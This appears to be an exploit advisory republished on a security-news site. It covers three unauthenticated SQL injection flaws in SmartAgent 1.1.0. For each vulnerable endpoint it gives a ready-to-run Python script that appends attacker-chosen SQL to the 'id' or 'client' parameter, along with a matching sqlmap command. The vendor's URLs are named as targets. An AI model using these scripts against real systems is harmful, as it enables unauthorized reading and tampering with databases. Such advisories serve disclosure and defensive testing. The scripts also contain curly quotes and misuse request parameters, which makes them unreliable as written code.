Security
Headlines
HeadlinesLatestCVEs

Headline

SmartAgent 1.1.0 SQL Injection

SmartAgent version 1.1.0 suffers from multiple unauthenticated remote SQL injection vulnerabilities.

Packet Storm
#sql#vulnerability#web#linux#php#auth

Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)

Date: 01-10-2024

Exploit Author: Alter Prime

Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com

Version: Build v1.1.0

Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php.

The POST request includes the folowing parameters “action=exportNetworkDate&id=1111” and vulnerable parameter is "id".

Steps To Reproduce:

  1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = “https://smartagent.[client].com/privateArea/common/tests/interface.php”
sqlcommand = input("Enter the command you want to run (EX: UNION SELECT @@version): ")

postdata = {
"action": "exportNetworkDate",
"id": “1111” + sqlcommand
}

response = requests.post(url, data=postdata, verify=False)
print(response.text)

  1. Alternatively SQLMAP could pe used on the same endpoint

sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data “action=exportNetworkDate&id=1111” -p “id”

Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)

Date: 01-10-2024

Exploit Author: Alter Prime

Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com

Version: Build v1.1.0

Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123.

The GET request includes the vulnerable parameter "id".

Steps To Reproduce:

  1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = “https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php”
sqlcommand = input("Enter the command you want to run (EX: UNION SELECT @@version): ")

parameter = {
"id": “123” + sqlcommand
}

response = requests.get(url, data=parameter, verify=False)
print(response.text)

  1. Alternatively SQLMAP could pe used on the same endpoint

sqlmap -u https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p “id”

Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)

Date: 01-10-2024

Exploit Author: Alter Prime

Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com

Version: Build v1.1.0

Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111.

The GET request includes the vulnerable parameter "client".

Steps To Reproduce:

  1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = “https://smartagent.[client].com/recuperaLog.php”
sqlcommand = input("Enter the command you want to run (EX: UNION SELECT @@version): ")

parameter = {
"client": “1111” + sqlcommand
}

response = requests.get(url, data=parameter, verify=False)
print(response.text)

  1. Alternatively SQLMAP could pe used on the same endpoint

sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p “client”

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution